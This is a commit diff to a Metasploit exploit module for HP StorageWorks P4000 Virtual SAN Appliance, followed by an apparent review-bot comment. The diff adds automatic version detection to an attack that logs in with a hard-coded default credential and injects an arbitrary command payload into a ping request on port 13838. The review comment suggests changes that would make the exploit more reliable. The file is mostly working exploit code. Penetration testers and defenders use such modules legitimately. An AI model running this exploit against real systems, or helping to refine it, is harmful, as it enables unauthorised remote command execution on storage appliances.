
Merge branch 'hp_vsa_exec_9' of github.com:jvazquez-r7/metasploit-fra…

…mework into jvazquez-r7-hp_vsa_exec_9
2 parents 189558b + 221ce22 commit 37634a9e60511b1f3651f6077ed5c70d83be37ee @sinn3r sinn3r committed Feb 19, 2013
Showing with 43 additions and 8 deletions.
  1. +43 −8 modules/exploits/multi/misc/hp_vsa_exec.rb
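--- a/modules/exploits/multi/misc/hp_vsa_exec.rb
+++ b/modules/exploits/multi/misc/hp_vsa_exec.rb
@@ -17,7 +17,7 @@ def initialize(info={})
 'Name' => "HP StorageWorks P4000 Virtual SAN Appliance Command Execution",
 'Description' => %q{
 This module exploits a vulnerability found in HP's StorageWorks P4000 VSA on
- versions prior to 9.5. By using a default account credential, it is possible
+ versions prior to 9.5. By using a default account credential, it is possible
 to inject arbitrary commands as part of a ping request via port 13838.
 },
 'License' => MSF_LICENSE,
@@ -50,9 +50,11 @@ def initialize(info={})
 'Arch' => ARCH_CMD,
 'Targets' =>
 [
- ['HP VSA prior to 9.5', {}]
+ [ 'Automatic', {} ],
+ [ 'HP VSA up to 8.5', { 'Version' => '8.5.0' } ],
+ [ 'HP VSA 9', { 'Version' => '9.0.0' } ]
 ],
- 'Privileged' => false,
+ 'Privileged' => true,
 'DisclosureDate' => "Nov 11 2011",
 'DefaultTarget' => 0))
@@ -75,20 +77,53 @@ def generate_packet(data)
 pkt
 end
+ def get_target
+ if target.name !~ /Automatic/
+ return target
+ end
- def exploit
- connect
-
- # Login packet
- print_status("#{rhost}:#{rport} Sending login packet")
+ # Login at 8.5.0
 packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"8.5.0\"")
+ print_status("#{rhost}:#{rport} Sending login packet for version 8.5.0")
+ sock.put(packet)
+ res = sock.get_once
+ vprint_status(Rex::Text.to_hex_dump(res)) if res
+ if res and res=~ /OK/ and res=~ /Login/
+ return targets[1]
+ end
+
+ # Login at 9.0.0
+ packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"9.0.0\"")
+ print_status("#{rhost}:#{rport} Sending login packet for version 9.0.0")
 sock.put(packet)
 res = sock.get_once
 vprint_status(Rex::Text.to_hex_dump(res)) if res
+ if res and res=~ /OK/ and res =~ /Login/
+ return targets[2]
+ end
+
+ fail_with(Msf::Exploit::Failure::NoTarget, "#{rhost}:#{rport} - Target auto detection didn't work'")
+ end
+
+ def exploit
+ connect
+
+ if target.name =~ /Automatic/
+ my_target = get_target
+ print_good("#{rhost}:#{rport} - Target #{my_target.name} found")
+ else
+ my_target = target
+ print_status("#{rhost}:#{rport} Sending login packet")
+ packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"#{my_target['Version']}\"")
+ sock.put(packet)
+ res = sock.get_once
+ vprint_status(Rex::Text.to_hex_dump(res)) if res
+ end
 # Command execution
 print_status("#{rhost}:#{rport} Sending injection")
 data = "get:/lhn/public/network/ping/127.0.0.1/foobar;#{payload.encoded}/"
+ data << "64/5/" if my_target.name =~ /9/
 packet = generate_packet(data)
 sock.put(packet)
 res = sock.get_once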
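Review bot: In `exploit`, the branch for an explicitly chosen target reads the login reply into `res` but never inspects it, so a rejected login is only dumped in verbose mode and the request that follows is sent regardless, while `get_target` insists on `OK` and `Login` in the reply. Handling both paths the same way would make the failure visible, e.g. `fail_with(Msf::Exploit::Failure::NoAccess, "#{rhost}:#{rport} - Login failed") unless res and res =~ /OK/ and res =~ /Login/`. The `64/5/` suffix is keyed on the display name (`my_target.name =~ /9/`), which would silently change behaviour if a target were renamed; comparing `my_target['Version']` is sturdier. The `fail_with` message in `get_target` ends with a stray apostrophe (`didn't work'`). `exploit` continues past the end of this hunk, so any later handling of `res` is not visible here.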
